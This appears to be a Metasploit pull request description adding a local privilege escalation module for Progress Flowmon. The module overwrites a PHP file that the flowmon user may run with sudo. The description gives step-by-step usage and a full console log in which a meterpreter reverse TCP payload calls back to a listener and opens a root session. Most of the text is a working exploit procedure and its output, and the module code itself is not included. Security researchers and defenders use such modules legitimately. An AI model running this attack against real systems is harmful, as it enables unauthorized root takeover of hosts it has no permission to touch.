Add local privesc module for Flowmon

[DaveYesland]

This adds a local privesc exploit module which abuses the sudoers permissions for the Flowmon user to elevate to root.

Vulnerable Application

Progress Flowmon up to at least version 12.3.2 is vulnerable to local privilege escalation from the flowmon user to root. This is possible due to the flowmon user being able to run several commands with sudo. This module exploits the ability to overwrite a PHP file and execute it with sudo granting full sudo permissions to the flowmon user and elevating the shell to a root shell.

For more details on the vulnerability: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ (privesc methods)

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is available in cloud marketplaces:

• https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
• https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
• https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud

Verification Steps

1. Install the application
2. Start msfconsole
3. Gain a session on a Progress Kemp Loadmaster target as the flowmon user
4. Do: use exploits/linux/local/pprogress_flowmon_sudo_privesc_2024
5. Do: set SESSION <session>
6. Do: set LHOST <your host IP>
7. Do: run
8. You should get a shell as the root user.

Scenarios

Flowmon 12.2

Active sessions
===============

  Id  Name  Type                   Information                          Connection
  --  ----  ----                   -----------                          ----------
  2         meterpreter x64/linux  flowmon @ flowmon.my3m4o21xjze5fomt  138.111.211.11:4444 -> 172.174.209.1
                                   xp5e53h2h.bx.internal.cloudapp.net   01:50756 (10.1.0.4)

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > show options

Module options (exploit/linux/local/progress_flowmon_sudo_privesc):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   SESSION       2                yes       The session to run this module on
   TEMP_PAYLOAD  /tmp/sCmGZ       yes       The temporary name to use to store the payload.

Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

View the full module info with the info, or info -d command.

msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Copying /var/www/shtml/index.php to /tmp/index.php.bak
[*] Overwriting /var/www/shtml/index.php with payload
[*] Executing sudo to elevate privileges
[*] Replacing index.php with original file
[+] Deleted /tmp/sCmGZ
[*] Meterpreter session 3 opened (138.111.211.11:4444 -> 172.174.209.101:51042) at 2024-05-01 15:41:10 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root

[bwatters-r7]

Whoever grabs this should probably also grab https://github.com/rapid7/metasploit-framework/pull/19150